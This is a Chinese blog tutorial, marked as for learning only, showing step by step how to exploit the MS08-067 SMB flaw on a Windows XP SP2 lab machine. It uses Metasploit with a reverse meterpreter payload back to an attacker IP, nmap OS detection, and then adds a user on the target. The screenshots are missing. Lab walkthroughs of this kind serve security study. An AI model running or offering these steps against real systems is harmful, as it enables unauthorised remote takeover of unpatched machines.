Metasploit利用MS08-067漏洞

版权声明:仅限学习,联系方式:qq:516214485。博客中涉及到的技术可能存在破坏性,禁止使用于包括学习之外其他用途,如造成法律责任,博主概不负责! https://blog.csdn.net/huanghelouzi/article/details/84309473

环境

攻击机器:ubuntu 18.04
被攻击机器:windows xp sp2

可能使用的工具

metasploit
nessus
nmap等

正文

首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166
在这里插入图片描述
发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS08-067.ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,当然在老系统中。
在这里插入图片描述

  1. 使用命令msfconsole进入metasploit控制台
  2. 使用命令search ms08-067搜索MS08-067可利用的exploit
    在这里插入图片描述
  3. 使用命令use exploit/windows/smb/ms08_067_netapi选择exploit
  4. 使用命令show options查看配置选项
    在这里插入图片描述
  5. 使用命令show payloads查看所有可以利用的payload
    在这里插入图片描述
  6. 使用set命令设置payloadset payload windows/meterpreter/rever
  7. 设置所有的必选的参数,其中攻击机的IP为192.168.1.181,被攻击机器IP为192.168.1.166
    在这里插入图片描述
    其中的target的值为10代表目标机器的操作系统为windows xp sp2 简体中文版
    在这里插入图片描述
    操作系统的确定可以使用nmap -O
    在这里插入图片描述
  8. 使用命令run运行
    在这里插入图片描述
  9. 后继操作
    后继的操作就很好玩了,比如创建一个新的用户
    在这里插入图片描述
    结束。

没有更多推荐了,返回首页